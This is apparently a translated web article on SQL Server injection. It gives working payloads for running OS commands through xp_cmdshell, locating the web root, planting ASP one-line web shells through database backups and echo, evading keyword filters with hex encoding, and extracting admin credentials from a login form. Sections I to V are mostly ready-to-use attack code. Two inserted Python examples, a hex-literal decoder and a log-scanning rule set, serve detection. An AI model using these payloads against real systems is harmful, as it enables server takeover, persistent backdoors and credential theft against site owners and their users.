In-depth analysis of SQL Server injection techniques

Source: Internet
Author: User
Tags: comparison, mssql, sql server, injection, backup

SQL Server Injection Tips

I. How to get command-execution output back quickly (sa privileges)

With a display column
Without a display column
In fact, the key is not whether there is a display column. EXEC master..xp_cmdshell 'SystemInfo' produces many rows when it is written into a table, and the problem is how to get all of those rows out, either through a display column or by dumping them in one go through an error message. The key is concatenating many rows into one string.

Method ①

BEGIN
IF EXISTS (SELECT table_name FROM information_schema.tables WHERE table_name = 'test_1') DROP TABLE test_1;
IF EXISTS (SELECT table_name FROM information_schema.tables WHERE table_name = 'test_2') DROP TABLE test_2;
CREATE TABLE test_1 ([output] [varchar](1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'ipconfig /all';
DECLARE @result varchar(8000)
SET @result = '~'
SELECT @result = @result + ' ' + output FROM test_1 WHERE output > ''
SELECT @result AS result INTO test_2;
SELECT CONVERT(int, (SELECT result FROM test_2));
END;


Analysis:

Lines 6-9 of the block declare a variable @result, set its initial value to '~', read the rows of test_1 one by one (the condition is output > ''), concatenate them into a new string separated by spaces, and assign the result back to @result; @result is then given an alias and written into test_2.
The last line forces a conversion error so the whole string is echoed in the error message (error-based output).
PS:
MSSQL compares letters case-insensitively (under the default collation).
MSSQL compares strings the same way C's strcmp() does.
Method ② (tested successfully at an injection point; platform SQL Server 2008, 10.0.1600.22 (x64))

Error-based: AND (SELECT * FROM test_1 FOR XML PATH('')) = 1--
Display column: UNION SELECT 1, (SELECT * FROM test_1 FOR XML PATH(''))--

II. How to quickly find the site directory (sa user)

sa user with reduced privileges
sa user without reduced privileges
It makes sense to distinguish the two cases. If privileges have not been reduced, you can read configuration stored locally; if privileges are low, you can use the dir command to search for it.

Method ① (privileges reduced; tested successfully):

CREATE TABLE test_1 ([output] [varchar](1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'dir /s d:\web.config';
AND (SELECT * FROM test_1 FOR XML PATH('')) = 1;

Method ② (privileges not reduced, running as SYSTEM; success):

CREATE TABLE test_1 ([output] [varchar](1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM w3svc/1/root';
AND (SELECT * FROM test_1 FOR XML PATH('')) = 1;

Method ③ (sa + SYSTEM privileges + IIS 7.0 / IIS 7.5):

%systemroot%\system32\inetsrv\appcmd.exe list site--   (lists the sites)
%systemroot%\system32\inetsrv\appcmd.exe list vdir--   (lists the physical path of each site)

PS:
%systemroot% stands for C:\windows\

III. How to get a shell through the injection point

Method ① (differential backup) – tested successfully – no special permissions are required, so it can be tried at non-sa injection points

IF EXISTS (SELECT table_name FROM information_schema.tables WHERE table_name = 'test_tmp') DROP TABLE test_tmp;
BACKUP DATABASE xfdata TO DISK = 'D:\WebRoot\asp.bak';
CREATE TABLE [dbo].[test_tmp] ([cmd] [image]);
INSERT INTO test_tmp (cmd) VALUES (0x3c25657865637574652872657175657374282261222929253e);
BACKUP DATABASE xfdata TO DISK = 'D:\WebRoot\asp.asp' WITH DIFFERENTIAL, FORMAT;


Method ② (log backup) – tested successfully – no special permissions are required, so it can be tried at non-sa injection points

IF EXISTS (SELECT table_name FROM information_schema.tables WHERE table_name = 'test_tmp') DROP TABLE test_tmp;
ALTER DATABASE xfdata SET RECOVERY FULL;
CREATE TABLE test_tmp (a image);
BACKUP LOG xfdata TO DISK = 'D:\WebRoot\asp.bak' WITH INIT;
INSERT INTO test_tmp (a) VALUES (0x3c25657865637574652872657175657374282261222929253eda);
BACKUP LOG xfdata TO DISK = 'D:\webroot\123.asp';


PS:
If the backup fails, it is most likely a permission problem on the target directory; try a different directory.
If the table already exists the step fails, so check whether the table exists and drop it first.

Method ③ (echo a one-line web shell to disk) – sa privileges + write permission for the current user – tested successfully

echo ^<%eval request("Pass")%^>>d:\%d1%a7%b7%d6%cf%b5%cd%b3\webroot\update.asp

PS:
Because this goes through the injection point, you have to pay attention to character encoding. Usually the encoding of the web page and the encoding of the database are the same (if they aren't... I'm out of luck ~~). I use a Chinese-language path as the example here; the directory name appears URL-encoded in the command above.
IV. How to avoid keywords such as SELECT

Method ①: hexadecimal obfuscation

;DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC(@S);--
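Keyword filters do not see what is inside a 0x literal, so a defender reviewing logs has to decode it: the literal above decodes to DROP TABLE TMP_DB;, and the image value inserted in section III decodes to a one-line ASP shell. The following Python is an added example of mine, not code from the original article: it pulls every 0x literal out of a statement, decodes it the way SQL Server would when casting to varchar, and flags keywords found in the decoded text. The keyword list, function names and sample statements are my own constructions.

```python
import re

# A T-SQL binary literal: 0x followed by hex digits, not glued to a preceding identifier character
HEX_LITERAL = re.compile(r"(?<![0-9A-Za-z_])0x([0-9A-Fa-f]+)")

# Tokens worth flagging when they appear inside a decoded literal; this list is my own choice
SUSPICIOUS = ("DROP", "BACKUP", "XP_CMDSHELL", "EXEC", "OPENROWSET", "<%")


def decode_hex_literal(literal: str) -> str:
    """Decode a 0x... literal as SQL Server stores it in a varchar: one byte per hex pair.

    SQL Server left-pads an odd-length literal with a zero nibble, so 0x1 becomes 0x01.
    latin-1 maps every byte to exactly one character, so nothing is lost or rejected.
    """
    digits = literal[2:] if literal[:2].lower() == "0x" else literal
    if len(digits) % 2:
        digits = "0" + digits
    return bytes.fromhex(digits).decode("latin-1")


def find_hidden_keywords(statement: str):
    """Return one (literal, decoded_text, matched_keywords) tuple per hex literal in the statement."""
    findings = []
    for match in HEX_LITERAL.finditer(statement):
        decoded = decode_hex_literal(match.group(0))
        hits = [k for k in SUSPICIOUS if k in decoded.upper()]
        findings.append((match.group(0), decoded, hits))
    return findings


# Constructed statements that reuse the two literals from this article (not captured traffic)
OBFUSCATED_DDL = (
    ";DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b "
    "AS VARCHAR(4000)); EXEC(@S);--"
)
IMAGE_INSERT = "INSERT INTO test_tmp (cmd) VALUES (0x3c25657865637574652872657175657374282261222929253e);"

if __name__ == "__main__":
    for stmt in (OBFUSCATED_DDL, IMAGE_INSERT):
        for literal, decoded, hits in find_hidden_keywords(stmt):
            print(f"{literal[:20]}... -> {decoded!r} flags={hits}")
```

Run against a query log or a WAF's captured parameter values, the decoded text is what should be matched against keyword rules, not the raw statement; a rule that only looks at the raw text is exactly what this obfuscation is meant to pass.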


V. How to get the back-end password quickly when the login form is injectable

1' HAVING 1=1--                        # reveals the table name
1' GROUP BY username HAVING 1=1--      # reveals the column names

# user_mess.account
# user_mess.pwd

1'; SELECT/**/CONVERT(int,(SELECT/**/TOP/**/1/**/account/**/FROM/**/user_mess))--
1'; SELECT/**/CONVERT(int,(SELECT/**/TOP/**/1/**/pwd/**/FROM/**/user_mess/**/WHERE/**/account='admin'))--
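Every technique in sections I to V leaves a recognisable shape in the statement text that a query audit (SQL Server Audit, Extended Events, or a database proxy) records: a stacked call to xp_cmdshell, a BACKUP written to a web-script extension, FOR XML PATH('') used to fold a table into one value, CONVERT(int, (SELECT ...)) error probes, and HAVING 1=1 column-name probes. The following Python is an added example of mine, not code from the original article: it runs a small rule set over constructed log lines and reports which rule each line trips. The rule names, the log format and the sample lines are my own constructions, and the /**/ comments used on this page as whitespace are collapsed before matching.

```python
import re

# Each rule is (name, compiled regex). Patterns are written from the techniques on this page;
# they are my own, not a vendor signature set.
RULES = [
    # stacked query reaching the command-execution procedure
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    # FOR XML PATH('') folds a whole table into one value for error-based or union extraction
    ("for_xml_path", re.compile(r"for\s+xml\s+path\s*\(\s*''\s*\)", re.I)),
    # BACKUP DATABASE/LOG aimed at a path whose extension a web server would execute
    ("backup_to_webroot", re.compile(
        r"backup\s+(database|log)\s+\S+\s+to\s+disk\s*=\s*'[^']*\.(asp|aspx|php|jsp)'", re.I)),
    # HAVING 1=1 / GROUP BY ... HAVING 1=1: column names leak through the error text
    ("having_probe", re.compile(r"having\s+1\s*=\s*1", re.I)),
    # CONVERT(int, (SELECT ...)): single-value extraction through a conversion error
    ("convert_int_subselect", re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select", re.I)),
]


def normalize(sql: str) -> str:
    """Replace /*...*/ comments with a space so tokens split by /**/ still match."""
    return re.sub(r"/\*.*?\*/", " ", sql)


def scan(lines):
    """Return [(rule_name, line)] for every rule that matches each log line."""
    hits = []
    for line in lines:
        text = normalize(line)
        for name, pattern in RULES:
            if pattern.search(text):
                hits.append((name, line))
    return hits


# Constructed sample of statement text as a query audit might record it (not real logs)
SAMPLE_LOG = [
    "2024-01-01T10:00:00 app=web stmt=SELECT name FROM products WHERE id = 42",
    "2024-01-01T10:00:01 app=web stmt=SELECT name FROM products WHERE id = 42; "
    "INSERT test_1 EXEC master.dbo.xp_cmdshell 'ipconfig /all';--",
    "2024-01-01T10:00:02 app=web stmt=SELECT name FROM products WHERE id = 42 "
    "AND (SELECT * FROM test_1 FOR XML PATH('')) = 1--",
    "2024-01-01T10:00:03 app=web stmt=SELECT name FROM products WHERE id = 42; "
    "BACKUP DATABASE xfdata TO DISK = 'D:\\WebRoot\\asp.asp' WITH DIFFERENTIAL,FORMAT;--",
    "2024-01-01T10:00:04 app=web stmt=SELECT * FROM user_mess WHERE account = '1' "
    "GROUP BY username HAVING 1=1--'",
    "2024-01-01T10:00:05 app=web stmt=SELECT * FROM user_mess WHERE account = '1'; "
    "SELECT/**/CONVERT(int,(SELECT/**/TOP/**/1/**/pwd/**/FROM/**/user_mess))--'",
    # a legitimate scheduled backup: .bak extension, outside the web root, should not trip a rule
    "2024-01-01T10:00:06 app=maint stmt=BACKUP DATABASE xfdata TO DISK = 'E:\\backups\\xfdata_full.bak'",
]

if __name__ == "__main__":
    for name, line in scan(SAMPLE_LOG):
        print(f"{name:24s} {line}")
```

The last sample line is the reason the backup rule keys on the file extension rather than on BACKUP itself: backups from the maintenance account are routine, while a backup from the web application's login aimed at an .asp file is not. In production the web application's SQL login should not hold the BACKUP DATABASE permission or access to xp_cmdshell at all, which removes the need for most of these rules.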



VI. Conclusion

This article was put together a long time ago; some places may be wrong, and I hope you will point them out.
